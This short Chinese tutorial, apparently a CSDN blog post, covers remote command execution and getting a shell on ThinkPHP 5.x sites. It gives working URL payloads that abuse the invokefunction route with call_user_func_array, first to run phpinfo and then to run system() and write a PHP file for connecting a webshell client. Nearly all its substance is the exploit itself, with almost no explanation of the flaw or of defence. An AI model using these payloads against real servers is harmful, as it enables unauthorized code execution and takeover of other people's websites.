简介
ThinkPHP(简称 TP)是一款流行的 国产开源 PHP 框架,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。
Thinkphp5x远程命令执行及getshell
原理
rce
过程
打开网站
tps://i-blog.csdnimg.cn/direct/955bfb8dfc634d4d879949111873c79a.png" width="1412" />
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1
在后面拼接指令即可
tps://i-blog.csdnimg.cn/direct/0dd288e9591842bf9663dfcaad02b2db.png" width="2172" />
getshell
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php访问后使用蚁剑链接即可
